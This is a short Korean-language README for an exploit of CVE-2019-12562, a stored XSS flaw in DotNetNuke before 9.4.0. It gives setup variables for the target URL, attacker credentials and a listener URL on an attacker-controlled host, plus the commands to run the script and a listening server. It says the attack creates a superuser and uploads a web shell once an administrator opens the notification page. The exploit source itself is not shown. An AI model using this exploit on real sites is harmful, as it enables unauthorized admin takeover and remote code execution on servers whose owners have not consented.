
DotNetNuke(DNN) 9.4.0 이전 버전에서의 저장형 크로스 사이트 스크립팅(Stored XSS) | XSS to RCE
CVE-2019-12562 DotNetNuke(DNN) 9.4.0 이전 버전의 저장형 XSS(Stored Cross-Site Scripting) 취약점으로, 원격 공격자가 관리자 알림(notification) 페이지에 악성 스크립트를 저장하고 삽입할 수 있습니다. 이 익스플로잇은 콘텐츠 관리, 사용자 추가, 서버에 백도어 업로드 등 관리자 권한으로 모든 작업을 수행하는 데 사용될 수 있습니다. 관리자가 저장형 XSS가 포함된 알림 페이지를 방문하면 공격이 성공합니다.
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
이 익스플로잇은 슈퍼유저를 생성하고 대상 서버에 웹셸을 업로드합니다
익스플로잇 조건 : 관리자 사용자가 알림 페이지를 방문하면 공격이 성공합니다.
더 읽어보기: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ CVE 참조: https://www.cvedetails.com/cve/CVE-2019-12562/